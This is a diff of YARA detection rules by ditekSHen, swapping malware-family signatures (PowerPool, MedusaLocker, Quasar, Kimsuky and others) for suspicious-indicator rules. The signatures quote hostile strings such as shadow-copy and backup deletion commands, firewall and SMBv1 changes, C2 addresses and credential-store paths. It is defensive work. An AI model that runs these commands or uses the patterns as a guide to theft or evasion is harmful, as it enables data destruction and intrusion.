-		$s16 = "SYSTEM_INFORMATION(): Failed! (Error:" fullword ascii
-		$s17 = "TARGET_HOST_UPDATE(): Sync successful!" fullword ascii
-		$s18 = "PLUGIN_PROCESS_REVERSE_PROXY: Plugin" ascii
-		$s19 = "PLUGIN_PROCESS: Plugin" ascii
-		$s20 = "PLUGIN_EXEC: Plugin" ascii
-		$s21 = "PLUGIN_PROCESS_SCREEN_STREAM: Plugin" ascii
-		$cnc1 = "?task_id=" fullword ascii
-		$cnc2 = "&operation=" fullword ascii
-		$cnc3 = "&filesize=" fullword ascii
-		$cnc4 = "pos=" fullword ascii
-		$cnc5 = "&mode=" fullword ascii
-		$cnc6 = "&cmp=1" fullword ascii
-		$cnc7 = "&cmp=0" fullword ascii
-		$cnc8 = "&enc=1" fullword ascii
-		$cnc9 = "&enc=0" fullword ascii
-		$cnc10 = "&user=" fullword ascii
-		$cnc11 = "&uid=" fullword ascii
-		$cnc12 = "&key=" fullword ascii
+		$s1 = "[a-zA-Z0-9]{24}\\.[a-zA-Z0-9]{6}\\.[a-zA-Z0-9_\\-]{27}|mfa\\.[a-zA-Z0-9_\\-]{84}" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or all of ( $cnc* ) or 8 of ( $s* ) or ( 1 of ( $x* ) and 6 of ( $s* ) ) or ( 6 of ( $cnc* ) and 6 of ( $s* ) ) )
+		( uint16( 0 ) == 0x5a4d and all of them ) or all of them
 }
-rule DITEKSHEN_MALWARE_Win_Powerpool_STG1 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_VPN : FILE
 {
 	meta:
-		description = "Detects first stage PowerPool backdoor"
+		description = "Detects executables referencing many VPN software clients. Observed in infosteslers"
 		author = "ditekSHen"
-		id = "8531c22d-8d71-5794-b9c8-0a4cd81bb2b0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "301977a8-0619-50a2-a718-78ff9e039e65"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2334-L2361"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1900-L1914"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ab00d6e3007743a8bb30fbcdb435ac49101b52face55549ae454c64345caff9"
-		score = 75
-		quality = 75
+		logic_hash = "5bef727d3c6fa7ea01c16e7b1fdf146b4cef58c06189bf8540bbfe7915790578"
+		score = 40
+		quality = 31
 		tags = "FILE"
-		snort2_sid = "920088"
-		snort3_sid = "920086"
-		clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-1"
+		importance = 20
 
 	strings:
-		$s1 = "cmd /c powershell.exe $PSVersionTable.PSVersion > \"%s\"" fullword wide
-		$s2 = "cmd /c powershell.exe \"%s\" > \"%s\"" fullword wide
-		$s3 = "rar.exe a -r %s.rar -ta%04d%02d%02d%02d%02d%02d -tb%04d%02d%02d%02d%02d%02d" fullword wide
-		$s4 = "MyDemonMutex%d" fullword wide
-		$s5 = "MyScreen.jpg" fullword wide
-		$s6 = "proxy.log" fullword wide
-		$s7 = "myjt.exe" fullword wide
-		$s8 = "/?id=%s&info=%s" fullword wide
-		$s9 = "auto.cfg" fullword ascii
-		$s10 = "Mozilla/5.0 (Windows NT 6.1; WOW64)" fullword wide
-		$s11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)" fullword wide
-		$s12 = "CMD COMMAND EXCUTE ERROR!" fullword ascii
-		$c1 = "run.afishaonline.eu" fullword wide
-		$c2 = "home.Sports-Collectors.com" fullword wide
-		$c3 = "about.Sports-Collectors.com" fullword
-		$c4 = "179.43.158.15" fullword wide
-		$c5 = "185.227.82.35" fullword wide
+		$s1 = "\\VPN\\NordVPN" ascii wide nocase
+		$s2 = "\\VPN\\OpenVPN" ascii wide nocase
+		$s3 = "\\VPN\\ProtonVPN" ascii wide nocase
+		$s4 = "\\VPN\\DUC\\" ascii wide nocase
+		$s5 = "\\VPN\\PrivateVPN" ascii wide nocase
+		$s6 = "\\VPN\\PrivateVPN" ascii wide nocase
+		$s7 = "\\VPN\\EarthVPN" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $c* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Powerpool_STG2 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Vaultschemaguid : FILE
 {
 	meta:
-		description = "Detects second stage PowerPool backdoor"
+		description = "Detects executables referencing Windows vault credential objects. Observed in infostealers"
 		author = "ditekSHen"
-		id = "1a059900-3292-5419-a143-caea3e710191"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "440ac8a8-19c9-5284-a8e2-e0f2e8892a5e"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2363-L2395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1930-L1953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b80712bab281dbde816e2eda6ab1b4a9e21be26578fb755a1e1e1635675aa911"
-		score = 75
-		quality = 73
+		logic_hash = "121a51bbb749cc86d50fd5f79d7a24fbbb3e589e2fb25c553764a16202ff4065"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		snort2_sid = "920089-920091"
-		snort3_sid = "920087-920089"
-		clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-2"
+		importance = 20
 
 	strings:
-		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
-		$s2 = "LookupAccountSid Error %u" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; )" fullword ascii
-		$s4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii
-		$s5 = "Content-Disposition: form-data; name=\"%s\"" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
-		$s7 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii
-		$s8 = "in Json::Value::find" fullword ascii
-		$s9 = "in Json::Value::resolveReference" fullword ascii
-		$s10 = "in Json::Value::duplicateAndPrefixStringValue" fullword ascii
-		$s11 = ".?AVLogicError@Json@@" fullword ascii
-		$s12 = ".?AVRuntimeError@Json@@" fullword ascii
-		$s13 = "http:\\\\82.221.101.157:80" ascii
-		$s14 = "http://172.223.112.130:80" ascii
-		$s15 = "http://172.223.112.130:443" ascii
-		$s16 = "http://info.newsrental.net:80" ascii
-		$s17 = "%s|%I64d" ascii
-		$s18 = "open internet failed..." ascii
-		$s19 = "connect failed..." ascii
-		$s20 = "handle not opened..." ascii
-		$s21 = "corrupted regex pattern" fullword ascii
-		$s22 = "add cookie failed..." ascii
+		$s1 = "2F1A6504-0641-44CF-8BB5-3612D865F2E5" ascii wide
+		$s2 = "3CCD5499-87A8-4B10-A215-608888DD3B55" ascii wide
+		$s3 = "154E23D0-C644-4E6F-8CE6-5069272F999F" ascii wide
+		$s4 = "4BF4C442-9B8A-41A0-B380-DD4A704DDB28" ascii wide
+		$s5 = "77BC582B-F0A6-4E15-4E80-61736B6F3B29" ascii wide
+		$s6 = "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC" ascii wide
+		$s7 = "3E0E35BE-1B77-43E7-B873-AED901B6275B" ascii wide
+		$s8 = "3C886FF3-2669-4AA2-A8FB-3F6759A77548" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 14 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_MALWARE_Win_Egregor : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Antivm_UNK01 : FILE
 {
 	meta:
-		description = "Detects Egregor ransomware variants"
+		description = "Detects memory artifacts referencing specific combination of anti-VM checks"
 		author = "ditekSHen"
-		id = "2e24d4ec-39c2-5148-80a1-04f96bc8b477"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "57344ff4-5204-535a-a128-0f9f7eb7c760"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2397-L2434"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1955-L1977"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d39a7bf89a7574f7dfe56db78c8cdbbee97782f829805d4ee87fd9f1635154cd"
-		score = 75
-		quality = 75
+		logic_hash = "c34b23e26df0d33d60cf87e406dfbc90f9fd6df0da4415b6622d477cf38bc024"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Egregor"
+		importance = 20
 
 	strings:
-		$s1 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
-		$p1 = "--deinstall" fullword wide
-		$p2 = "--del" fullword wide
-		$p3 = "--exit" fullword wide
-		$p4 = "--kill" fullword wide
-		$p5 = "--loud" fullword wide
-		$p6 = "--nooperation" fullword wide
-		$p7 = "--nop" fullword wide
-		$p8 = "--skip" fullword wide
-		$p9 = "--useless" fullword wide
-		$p10 = "--yourmommy" fullword wide
-		$p11 = "-passegregor" ascii wide
-		$p12 = "-peguard" ascii wide
-		$p13 = "--nomimikatz" ascii wide
-		$p14 = "--multiproc" ascii wide
-		$p15 = "--killrdp" ascii wide
-		$p16 = "--nonet" ascii wide
-		$p17 = "--norename" ascii wide
-		$p18 = "--greetings" ascii wide
+		$s1 = "vmci.s" fullword ascii wide
+		$s2 = "vmmemc" fullword ascii wide
+		$s3 = "qemu-ga.exe" fullword ascii wide
+		$s4 = "qga.exe" fullword ascii wide
+		$s5 = "windanr.exe" fullword ascii wide
+		$s6 = "vboxservice.exe" fullword ascii wide
+		$s7 = "vboxtray.exe" fullword ascii wide
+		$s8 = "vmtoolsd.exe" fullword ascii wide
+		$s9 = "prl_tools.exe" fullword ascii wide
+		$s10 = "7869.vmt" fullword ascii wide
+		$s11 = "qemu" fullword ascii wide
+		$s12 = "virtio" fullword ascii wide
+		$s13 = "vmware" fullword ascii wide
+		$s14 = "vbox" fullword ascii wide
+		$s15 = "%systemroot%\\system32\\ntdll.dll" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( ( all of ( $s* ) and 1 of ( $p* ) ) or ( 2 of them and filesize < 1000KB and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".00cfg" ) ) ) ) ) or 8 of ( $p* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_MALWARE_Win_Redlinedropperexe : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Antivm_WMIC : FILE
 {
 	meta:
-		description = "Detects executables dropping RedLine infostealer"
+		description = "Detects memory artifacts referencing WMIC commands for anti-VM checks"
 		author = "ditekSHen"
-		id = "364ba540-60a5-5e1b-bb21-505a442eabb6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f7166171-15b7-5e11-bbec-355764e58caa"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2461-L2484"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1979-L1989"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cd1fb4a1d0883221dbdcc519db7f54b0f7285e8a19201dbc586c2520e8086bc2"
-		score = 75
-		quality = 75
+		logic_hash = "2c26ea8b008bf9cb4d8e24c909a3c6f5d67783b483747268f949fadc3fa72532"
+		score = 40
+		quality = 39
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-EXE"
+		importance = 20
 
 	strings:
-		$s1 = "Wizutezinod togeto0Rowadufevomuki futenujilazem jic lefogatenezinor" fullword wide
-		$s2 = "6Tatafamobevofaj bizafoju peyovavacoco lizine kezakajuj" fullword wide
-		$s3 = "Lawuherusozeru kucu zam0Zorizeyuk lepaposupu gala kinarusot ruvasaxehuwo" fullword wide
-		$s4 = "ClearEventLogW" fullword ascii
-		$s5 = "ProductionVersion" fullword wide
-		$s6 = "Vasuko)Yugenizugilobo toxocivoriye yexozoyohuzeb" wide
-		$s7 = "Yikezevavuzus gucajanesan#Rolapucededoxu xewulep fuwehofiwifi" wide
+		$s1 = "wmic process where \"name like '%vmwp%'\"" ascii wide nocase
+		$s2 = "wmic process where \"name like '%virtualbox%'\"" ascii wide nocase
+		$s3 = "wmic process where \"name like '%vbox%'\"" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.exports ( "_fgeek@8" ) and 2 of them ) or ( 2 of them and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".rig" ) ) )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule DITEKSHEN_MALWARE_Win_Nibiru : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Enablesmbv1 : FILE
 {
 	meta:
-		description = "Detects Nibiru ransomware"
+		description = "Detects binaries with PowerShell command enabling SMBv1"
 		author = "ditekSHen"
-		id = "78c3bf75-1ab3-5f88-ba4b-d5a0a906d57c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "cb3b43f3-8f45-5e4e-8e5e-9bfb89e842d3"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2486-L2504"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1991-L1999"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f3718e9091b09e0f47ecd6715a3a2c160ede6ab9fb144e7ed115dd5a25c8e379"
-		score = 75
-		quality = 75
+		logic_hash = "68eb41d843b39e784d99153607c1deecdb5258cdbf641e2dd177c364847d85b1"
+		score = 40
+		quality = 43
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Nibiru"
+		importance = 20
 
 	strings:
-		$s1 = ".encrypt" fullword wide
-		$s2 = "crypted" fullword wide
-		$s3 = ".Nibiru" fullword wide
-		$s4 = "Encryption Complete" fullword wide
-		$s5 = "All your files,documents,important datas,mp4,mp3 and anything valuable" ascii
-		$s6 = "EncryptOrDecryptFile" fullword ascii
-		$s7 = "get_hacker" ascii
-		$s8 = "/C choice /C Y /N /D Y /T 3 & Del \"" fullword wide
-		$s9 = "Once You pay,you get the KEY to decrypt files" ascii
-		$pdb = "\\Projects\\Nibiru\\Nibiru\\obj\\x86\\Release\\Nibiru.pdb" ascii
+		$s1 = "Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of them or ( $pdb and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Medusalocker : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Enablenetworkdiscovery : FILE
 {
 	meta:
-		description = "Detects MedusaLocker ransomware"
-		author = "ditekshen"
-		id = "06b7645f-228d-5ec1-9b82-88caee447a5c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects binaries manipulating Windows firewall to enable permissive network discovery"
+		author = "ditekSHen"
+		id = "b1203e7a-b4f3-587e-aaea-a4cccaedc07d"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2506-L2537"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2001-L2010"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e2a0a9f12f550a5c6a11731710e0dc2c2e26d17f43d2385bf6e298518631771"
-		score = 75
-		quality = 73
+		logic_hash = "6c28a33849d1c6c72b65926a81e96f0e3f5b9bb0a48739bf4240a16f6a10dcea"
+		score = 40
+		quality = 41
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.MedusaLocker"
+		importance = 20
 
 	strings:
-		$x1 = "\\MedusaLockerInfo\\MedusaLockerProject\\MedusaLocker\\Release\\MedusaLocker.pdb" ascii
-		$x2 = "SOFTWARE\\Medusa" wide
-		$x3 = "=?utf-8?B?0RFQctTF0YDQcNC60IXQvdC+IEludGVybmV0IED4cGxvseVyIDEz?=" ascii
-		$s1 = "Recovery_Instructions.mht" fullword wide
-		$s2 = "README_LOCK.TXT" fullword wide
-		$s3 = "C:\\Users\\Public\\Desktop" wide
-		$s4 = "[LOCKER] " wide
-		$s5 = "TmV3LUl0ZW0gJ2" ascii
-		$s6 = "<HEAD>=20" ascii
-		$s7 = "LIST OF ENCRYPTED FILES" ascii
-		$s8 = "KEY.FILE" ascii
-		$cmd1 = { 2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00 20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 }
-		$cmd2 = "vssadmin.exe delete" wide nocase
-		$cmd3 = "bcdedit.exe /set {default}" wide
-		$cmd4 = "wbadmin delete systemstatebackup" wide nocase
-		$mut1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide
-		$mut2 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" fullword wide
-		$mut3 = "{6EDD6D74-C007-4E75-B76A-E5740995E24C}" fullword wide
-		$ext1 = { 2e 00 52 00 65 00 61 00 64 00 49 00 6e 00 73 00
-                  74 00 72 00 75 00 63 00 74 00 69 00 6f 00 6e 00
-                  73 00 00 00 00 00 00 00 2e 00 6b 00 65 00 76 00
-                  65 00 72 00 73 00 65 00 6e }
-		$ext2 = ".exe,.dll,.sys,.ini,.lnk,.rdp,.encrypted" fullword ascii
+		$s1 = "netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes" ascii wide nocase
+		$s2 = "netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 4 of ( $s* ) or 1 of ( $mut* ) ) ) or 6 of ( $s* ) or ( 1 of ( $mut* ) and 2 of ( $cmd* ) ) or ( 1 of ( $ext* ) and 5 of them ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Ransomexx : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Authapps : FILE
 {
 	meta:
-		description = "Detects RansomEXX ransomware"
-		author = "ditekshen"
-		id = "4d1294de-d73c-5f9c-adb7-18ce5b5aca9f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables referencing many authentication apps. Observed in information stealers"
+		author = "ditekSHen"
+		id = "b2c1307d-ac4a-567f-ab14-7c65e16d984e"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2539-L2555"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2012-L2021"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "351398d89b847b3439fa58b7aab50f3c6e48be27877d3f8b85cc78e994413ecc"
-		score = 75
-		quality = 75
+		logic_hash = "9c730ba532dca023821fd9073bffeecf099a2a956b7715421bd0b4e5e5d4b2cf"
+		score = 40
+		quality = 41
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.RansomEXX"
+		importance = 20
 
 	strings:
-		$id = "ransom.exx" ascii
-		$s1 = "!TXDOT_READ_ME!.txt" fullword wide
-		$s2 = "debug.txt" fullword wide
-		$s3 = ".txd0t" fullword wide
-		$s4 = "crypt_detect" fullword wide
-		$s5 = "powershell.exe" fullword wide
-		$s6 = "cipher.exe" fullword ascii wide
-		$s7 = "?ReflectiveLoader@@" ascii
+		$s1 = "WinAuth\\winauth.xml" ascii wide nocase
+		$s2 = "Authy Desktop\\Local" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $id and 3 of ( $s* ) ) or all of ( $* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Quasarstealer : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Undocumented_Winapi_Kerberos : FILE
 {
 	meta:
-		description = "Detects Quasar infostealer"
-		author = "ditekshen"
-		id = "d0d532fe-bd0a-560a-8570-f6038d694338"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables referencing undocumented kerberos Windows APIs and obsereved in malware"
+		author = "ditekSHen"
+		id = "1eb7faab-66b8-5d98-b6a8-75a078c2f6f8"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2557-L2572"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2054-L2068"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4b6ab49992db4d7bf4404d51b0ef1773249de89545ec31176ad45d00803ba703"
-		score = 75
-		quality = 75
+		logic_hash = "19f22dcbc63723624d92be22cd69dcbab03a0b46299d43bc50ba73c79e573596"
+		score = 40
+		quality = 35
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.QuasarStealer"
+		importance = 20
 
 	strings:
-		$s1 = "PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null" fullword ascii
-		$s2 = "DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii
-		$s3 = "Process already elevated." fullword wide
-		$s4 = "get_PotentiallyVulnerablePasswords" fullword ascii
-		$s5 = "GetKeyloggerLogsDirectory" ascii
-		$s6 = "set_PotentiallyVulnerablePasswords" fullword ascii
-		$s7 = "BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>" ascii
+		$kdc1 = "KdcVerifyEncryptedTimeStamp" ascii wide nocase
+		$kdc2 = "KerbHashPasswordEx3" ascii wide nocase
+		$kdc3 = "KerbFreeKey" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and all of ( $kdc* )
 }
-rule DITEKSHEN_MALWARE_Win_Bandook : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_NKN_BCP2P : FILE
 {
 	meta:
-		description = "Detects Bandook backdoor"
-		author = "ditekshen"
-		id = "c74bd688-c79e-5939-93a8-c2cd9f2cd60e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2676-L2705"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bff09f769aae890d81efe9926cc8ce85c1caa4eeeb6bc7d2321d2d906ac8d6cf"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Bandook"
-
-	strings:
-		$s1 = "\"%sLib\\dpx.pyc\" \"%ws\" \"%ws\" \"%ws\" \"%ws\" \"%ws\"" fullword wide
-		$s2 = "%s\\usd\\dv-%s.dat" fullword ascii
-		$s3 = "%sprd.dat" fullword ascii
-		$s4 = "%sfile\\shell\\open\\command" fullword ascii
-		$s5 = "explorer.exe , %s" fullword ascii
-		$f1 = "CaptureScreen" fullword ascii
-		$f2 = "StartShell" fullword ascii
-		$f3 = "ClearCred" fullword ascii
-		$f4 = "GrabFileFromDevice" fullword ascii
-		$f5 = "PutFileOnDevice" fullword ascii
-		$f6 = "ChromeInject" fullword ascii
-		$f7 = "StartFileMonitor" fullword ascii
-		$f8 = "DisableMouseCapture" fullword ascii
-		$f9 = "StealUSB" fullword ascii
-		$f10 = "DDOSON" fullword ascii
-		$f11 = "InstallMac" fullword ascii
-		$f12 = "SendCam" fullword ascii
-		$x1 = "RTC-TGUBP" fullword ascii
-		$x2 = "AVE_MARIA" fullword ascii
+		description = "Detects executables referencing NKN Blockchain P2P network"
+		author = "ditekSHen"
+		id = "21aa4034-8c8f-515e-b8a4-4ce32ad816a6"
+		date = "2024-06-08"
+		modified = "2024-06-08"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2070-L2086"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "98161fcac130ba758bd9f8c4bc7133b9ba862df61dd86ad7d0ecbb0f18813a5e"
+		score = 40
+		quality = 45
+		tags = "FILE"
+		importance = 20
+
+	strings:
+		$x1 = "/nknorg/nkn-sdk-go." ascii
+		$x2 = "://seed.nkn.org" ascii
+		$x3 = "/nknorg/nkn/" ascii
+		$s1 = ").NewNanoPayClaimer" ascii
+		$s2 = ").IncrementAmount" ascii
+		$s3 = ").BalanceByAddress" ascii
+		$s4 = ").TransferName" ascii
+		$s5 = ".GetWsAddr" ascii
+		$s6 = ".GetNodeStateContext" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 6 of ( $f* ) or ( 2 of ( $s* ) and 3 of ( $f* ) ) or ( all of ( $x* ) and ( 2 of ( $f* ) or 3 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Kimsuky : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Passwordmanagers : FILE
 {
 	meta:
-		description = "Detects Kimsuky backdoor"
-		author = "ditekshen"
-		id = "6216b874-13f1-5283-9d17-90b7ca6996f8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables referencing many Password Manager software clients. Observed in infostealers"
+		author = "ditekSHen"
+		id = "4da7bf22-fdd7-53b7-bdfc-da7ac5657f6f"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2707-L2730"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2088-L2099"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9f9e64a9cfb3f61bc6b355035c5f0644e4750b740e05cb557c6183c7acfc5a19"
-		score = 75
-		quality = 75
+		logic_hash = "6d2f7739282611166a7e06d96345c46df92500b387d9f940169d5ee6664ea5ad"
+		score = 40
+		quality = 37
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Kimsuky"
+		importance = 20
 
 	strings:
-		$s1 = "Win%d.%d.%dx64" fullword ascii
-		$s2 = ".zip" fullword ascii
-		$s3 = ".enc" fullword ascii
-		$s4 = "&p2=a" fullword ascii
-		$s5 = "Content-Disposition: form-data; name=\"binary\"; filename=\"" fullword ascii
-		$s6 = "%s/?m=a&p1=%s&p2=%s-%s-v%d" fullword ascii
-		$s7 = "/?m=b&p1=" fullword ascii
-		$s8 = "/?m=c&p1=" fullword ascii
-		$s9 = "/?m=d&p1=" fullword ascii
-		$s10 = "http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s" fullword ascii
-		$s11 = "taskkill.exe /im iexplore.exe /f" fullword ascii
-		$s12 = "GetParent" fullword ascii
-		$s13 = "DllRegisterServer" fullword ascii
-		$dll1 = "AutoUpdate.dll" fullword ascii
-		$dll2 = "dropper-ie64.dll" fullword ascii
+		$s1 = "1Password\\" ascii wide nocase
